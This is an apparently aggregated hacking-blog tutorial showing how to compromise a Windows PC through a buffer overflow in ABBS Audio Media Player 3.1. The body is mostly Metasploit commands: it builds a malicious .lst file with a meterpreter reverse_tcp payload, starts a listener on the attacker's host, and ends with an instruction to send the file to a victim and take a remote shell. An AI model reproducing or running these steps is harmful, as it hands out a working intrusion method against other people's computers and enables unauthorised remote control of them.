Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1812

Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

$
0
0
This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ABBS Audio Media Player 3.1

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/abbs_amp_lst
msf exploit (abbs_amp_lst)>set payload windows/meterpreter/reverse_tcp
msf exploit (abbs_amp_lst)>set lhost 192.168.1.115 (IP of Local Host)
msf exploit (abbs_amp_lst)>exploit  


After we successfully generate the malicious lst File, it will stored on your local computer
/root/.msf4/local/msf.lst


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.115
exploit

Now send your msf. lst files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.



Viewing all articles
Browse latest Browse all 1812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>